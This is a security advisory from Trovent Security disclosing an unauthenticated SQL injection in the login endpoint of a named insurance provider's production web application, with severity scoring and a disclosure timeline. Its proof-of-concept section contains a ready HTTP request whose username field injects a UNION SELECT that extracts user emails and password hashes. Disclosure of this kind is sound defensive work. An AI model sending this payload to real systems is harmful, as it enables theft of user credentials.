SQL Injection in Login API Endpoint
Overview
Advisory ID: TRSA-2004-01
Advisory version: 1.0
Advisory status: Public
Advisory URL: https://trovent.io/security-advisory-2004-01
Affected product: Web application https://production.gateway.insure
Affected version: N/A
Vendor: Hepstar Financial Services (Pty) Ltd, https://www.hepstar.com
Credits: Trovent Security GmbH, Stefan Pietsch
Detailed Description
Trovent Security GmbH discovered an SQL injection vulnerability in a web
application of Hepstar. An attacker is able to execute SQL commands without authentication. It is possible to read data from all tables of the database.
Severity: Critical
CVSS Score: 9.8 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
CVE ID: N/A
CWE ID: CWE-89
Note: Trovent Security GmbH did not perform a penetration test of the web application.
Proof of Concept
Sample HTTP request used to verify the vulnerability:
POST /authentication/rest/login HTTP/1.1 Host: production.gateway.insure Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 139 Connection: close
username=x'%20UNION%20SELECT%20SUBSTRING(GROUP_CONCAT(email,'|',password),1,1024),11,11,12345,11,11%20FROM%20security_user--%20-&password=y
Solution / Workaround
Application source code has to be modified to fix the vulnerability.
History
2020-04-17: Vulnerability found, vendor contacted
2020-04-20: Vendor replied, asking for details
2020-04-21: Vulnerability details reported to vendor
2020-04-22: Trovent verified remediation of the vulnerability
2020-05-16: Advisory published